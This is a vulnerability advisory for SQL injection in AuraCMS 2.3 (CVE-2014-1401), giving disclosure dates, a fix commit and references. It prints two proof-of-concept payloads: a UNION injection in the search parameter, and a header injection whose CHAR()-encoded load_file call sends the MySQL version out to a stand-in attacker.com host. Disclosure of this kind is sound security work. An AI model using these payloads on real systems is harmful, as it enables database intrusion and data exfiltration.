Total Tests:

Multiple SQL Injection Vulnerabilities in AuraCMS

Advisory ID:HTB23196
Product:AuraCMS
Vendor:AuraCMS
Vulnerable Versions:2.3 and probably prior
Tested Version:2.3
Advisory Publication:January 8, 2014 [without technical details]
Vendor Notification:January 8, 2014
Vendor Fix:January 30, 2014
Public Disclosure:February 5, 2014
Latest Update:January 31, 2014
Vulnerability Type:SQL Injection [CWE-89]
CVE Reference:CVE-2014-1401
Risk Level:Medium
CVSSv2 Base Score:6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in AuraCMS, which can be exploited to alter SQL queries and execute arbitrary SQL commands in application's database.

1) Multiple SQL Injection Vulnerabilities in AuraCMS: CVE-2014-1401
1.1 The vulnerability exists due to insufficient validation of "search" HTTP GET parameter passed to "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.
The exploitation example below displays version of MySQL server:
http://[host]/index.php?mod=content&action=search&search=1%27%29%2f**%2funio n%2f**%2fselect%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202

1.2 The vulnerability exists due to insufficient validation of "CLIENT_IP", "X_FORWARDED_FOR", "X_FORWARDED", "FORWARDED_FOR", "FORWARDED" HTTP headers in "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.
The exploitation example below displays version of MySQL server:
GET / HTTP/1.1
CLIENT_IP: '),('',(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))) -- 2

How to Detect SQL Injection Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Fixed by vendor on January 30, 2014 directly in the source code without version modification/new release. Update to the version 2.3 released after January 30, 2014.

More Information:
https://github.com/auracms/AuraCMS/commit/4fe9d0d31a32df392f4d6ced8e5c25ed4af19ade


References:
[1] High-Tech Bridge Advisory HTB23196 - https://www.immuniweb.com/advisory/HTB23196 - Multiple SQL Injection Vulnerabilities in AuraCMS.
[2] AuraCMS - http://auracms.org - AuraCMS is an open source software that will let you manage content of your website.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - Leveraging the power of machine-learning and genius of human brain to deliver the most advanced web application security and penetration testing.
[6] ImmuniWeb® SSLScan - Test your servers for security and compliance with PCI DSS, HIPAA and NIST.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential